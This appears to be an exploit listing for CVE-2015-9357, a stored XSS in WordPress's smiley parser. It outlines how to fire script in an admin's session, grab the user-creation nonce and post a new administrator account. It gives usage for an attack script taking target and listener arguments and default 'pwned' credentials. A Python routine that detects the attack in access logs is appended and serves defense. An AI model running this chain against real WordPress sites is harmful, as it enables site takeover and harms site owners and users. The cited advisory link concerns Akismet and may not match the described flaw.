## https://sploitus.com/exploit?id=AFA9B134-5F05-5222-9883-9FF99C6BDF35
# CVE-2015-9357
wordpress smiley/emoticon parser stored xss, admin user creation via forged nonce request.
breaks out of the `` attribute context through the emoticon regex and lands js in an `onerror` handler. no script tag needed; survives wp_kses filtering on the affected field.
chain: submit payload to any field that gets smiley-converted, admin views it, xss fires in their session, pulls create-user nonce from user-new.php, posts new administrator account, confirm via login.
lab/educational use only. requires the target field to actually apply wordpress smiley conversion, which varies by theme/plugin.
original vuln disclosure: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
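the chain above leaves a distinctive trace on the server side: the admin's browser fetches user-new.php for the nonce and posts the add-user form seconds later, both with a Referer of whatever admin page rendered the payload instead of user-new.php itself. the following is an added detection example (not part of this tool) that scans combined-format access logs for exactly that pattern; the log lines and hostnames are constructed samples.

```python
import re
from datetime import datetime
from urllib.parse import urlparse

# constructed sample access-log lines (combined log format); first three mimic
# an XHR-driven admin creation launched from edit-comments.php, last two a
# normal manual creation via the users.php -> user-new.php flow.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2015:10:01:02 +0000] "GET /wp-admin/edit-comments.php HTTP/1.1" 200 5120 "https://blog.example/wp-admin/" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2015:10:01:03 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 4010 "https://blog.example/wp-admin/edit-comments.php" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2015:10:01:04 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0 "https://blog.example/wp-admin/edit-comments.php" "Mozilla/5.0"
10.0.0.9 - - [12/Oct/2015:11:20:00 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 4010 "https://blog.example/wp-admin/users.php" "Mozilla/5.0"
10.0.0.9 - - [12/Oct/2015:11:20:40 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0 "https://blog.example/wp-admin/user-new.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
USER_NEW = '/wp-admin/user-new.php'

def suspicious_user_creations(log_text, max_gap_s=5):
    """Flag POSTs to user-new.php that look script-driven rather than form-driven.
    Two heuristics: (1) Referer is not user-new.php (a submitted form refers from
    the form page; an XHR refers from the page hosting the payload), and (2) the
    POST follows a GET of user-new.php from the same IP within max_gap_s seconds
    (nonce fetch + immediate submit). A stripped Referer also trips (1), so tune."""
    last_get = {}   # ip -> time of most recent GET /wp-admin/user-new.php
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m['path'].startswith(USER_NEW):
            continue
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        if m['method'] == 'GET':
            last_get[m['ip']] = ts
            continue
        if m['method'] != 'POST':
            continue
        ref_path = urlparse(m['referer']).path
        bad_referer = ref_path != USER_NEW
        prev = last_get.get(m['ip'])
        fast = prev is not None and (ts - prev).total_seconds() <= max_gap_s
        if bad_referer or fast:
            hits.append({'ip': m['ip'], 'ts': m['ts'], 'referer': ref_path,
                         'bad_referer': bad_referer, 'fast_after_nonce_fetch': fast})
    return hits
```

pair any hit with the wp_users table (new administrator rows around that timestamp) before acting on it, since the referer signal alone is a heuristic.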
## usage
```
python3 CVE-2015-9357.py -t https://target -l LHOST -p LPORT \
--endpoint https://target/wp-admin/admin-ajax.php \
--field message --action --nonce \
--data "name=a,email=a@a.com,phone=a"
```
`--endpoint` / `--field` depend on where the vulnerable input actually lives (comments, contact form, etc.); find it manually first.
output on success: admin creds (`pwned` / `Password123!`) and wp-admin url.
## by saretawa